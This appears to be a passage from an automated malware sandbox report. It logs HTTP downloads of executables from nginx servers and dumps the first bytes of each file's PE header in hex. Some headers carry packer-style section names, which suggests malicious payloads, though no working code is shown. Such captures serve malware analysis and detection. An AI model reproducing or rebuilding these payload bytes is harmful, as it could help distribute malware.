00 00 4c 01 05 00 a0 98 24 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 4b 13 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:57:35 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 90 6c 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 2e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ab 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e 00 ec 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a cf 01 00 00 10 00 00 00 d0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 08 d1 00 00 00 e0 01 00 00 d2 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c bd 2b 00 00 c0 02 00 00 9e 0a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3e 4b 00 00 00 80 2e 00 00 4c 00 00 00 44 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:57:48 GMTContent-Type: application/octet-streamContent-Length: 2712064Last-Modified: Fri, 01 Nov 2024 09:00:50 GMTConnection: keep-aliveETag: "672498c2-296200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 29 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2a 00 00 04 00 00 c2 10 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 76 74 6e 77 6f 78 70 00 20 29 00 00 a0 00 00 00 02 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6f 64 7a 6c 6a 74 6b 00 20 00 00 00 c0 29 00 00 04 00 00 00 3c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 29 00 00 22 00 00 00 40 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:57:49 GMTContent-Type: application/octet-streamContent-Length: 2712064Last-Modified: Fri, 01 Nov 2024 09:00:50 GMTConnection: keep-aliveETag: "672498c2-296200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 29 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2a 00 00 04 00 00 c2 10 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 76 74 6e 77 6f 78 70 00 20 29 00 00 a0 00 00 00 02 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6f 64 7a 6c 6a 74 6b 00 20 00 00 00 c0 29 00 00 04 00 00 00 3c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 29 00 00 22 00 00 00 40 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:57:50 GMTContent-Type: application/octet-streamContent-Length: 1852416Last-Modified: Fri, 01 Nov 2024 09:52:29 GMTConnection: keep-aliveETag: "6724a4dd-1c4400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 49 00 00 04 00 00 34 20 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 85 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 84 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 69 62 68 73 6d 63 6f 00 30 19 00 00 60 30 00 00 26 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 63 68 68 7a 70 79 00 10 00 00 00 90 49 00 00 06 00 00 00 1c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 49 00 00 22 00 00 00 22 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:58:01 GMTContent-Type: application/octet-streamContent-Length: 1852416Last-Modified: Fri, 01 Nov 2024 09:52:29 GMTConnection: keep-aliveETag: "6724a4dd-1c4400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 49 00 00 04 00 00 34 20 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 85 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 84 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 69 62 68 73 6d 63 6f 00 30 19 00 00 60 30 00 00 26 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 72 63 68 68 7a 70 79 00 10 00 00 00 90 49 00 00 06 00 00 00 1c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 49 00 00 22 00 00 00 22 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:58:25 GMTContent-Type: application/octet-streamContent-Length: 2712064Last-Modified: Fri, 01 Nov 2024 09:00:50 GMTConnection: keep-aliveETag: "672498c2-296200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 29 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2a 00 00 04 00 00 c2 10 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 76 74 6e 77 6f 78 70 00 20 29 00 00 a0 00 00 00 02 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6f 64 7a 6c 6a 74 6b 00 20 00 00 00 c0 29 00 00 04 00 00 00 3c 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 29 00 00 22 00 00 00 40 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 01 Nov 2024 09:58:27 GMTContent-Type: application/octet-streamContent-Length: 1852416Last-Modified: Fri, 01 Nov 2024 09:52:29 GMTConnection: keep-aliveETag: "6724a4dd-1c4400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 49 00 00 04 00 00 34 20 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 85 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 84 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 